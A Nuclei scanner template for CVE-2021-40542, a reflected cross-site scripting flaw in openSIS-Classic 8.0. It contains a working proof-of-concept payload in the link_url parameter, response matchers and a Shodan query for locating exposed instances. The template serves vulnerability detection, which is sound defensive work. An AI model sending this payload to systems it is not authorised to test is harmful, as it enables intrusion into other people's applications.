nuclei-templates/http/cves/2021/CVE-2021-40542.yaml

53 lines
1.9 KiB
YAML

id: CVE-2021-40542
info:
name: Opensis-Classic 8.0 - Cross-Site Scripting
author: alph4byt3
severity: medium
description: |
Opensis-Classic Version 8.0 is affected by cross-site scripting. An unauthenticated user can inject and execute JavaScript code through the link_url parameter in Ajax_url_encode.php.
impact: |
Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected application.
remediation: |
To mitigate this vulnerability, it is recommended to apply the latest security patches or updates provided by the vendor.
reference:
- https://github.com/OS4ED/openSIS-Classic/issues/189
- https://nvd.nist.gov/vuln/detail/CVE-2021-40542
- https://github.com/ARPSyndicate/cvemon
- https://github.com/ARPSyndicate/kenzer-templates
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2021-40542
cwe-id: CWE-79
epss-score: 0.00643
epss-percentile: 0.78811
cpe: cpe:2.3:a:os4ed:opensis:8.0:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: os4ed
product: opensis
shodan-query: http.title:"openSIS"
tags: cve2021,cve,xss,opensis,os4ed
http:
- method: GET
path:
- '{{BaseURL}}/Ajax_url_encode.php?link_url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
part: body
words:
- "</script><script>alert(document.domain)</script>"
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
# digest: 4a0a0047304502201bf834abd657937ae412fc33a7d71f6d59db79266d9801d409f0d7d74274f0ad022100aefd147e291833eaf15cba8577654e79cf08eaacfc518e271ddb56bf1246c490:922c64590222798bb761d5b6d8e72950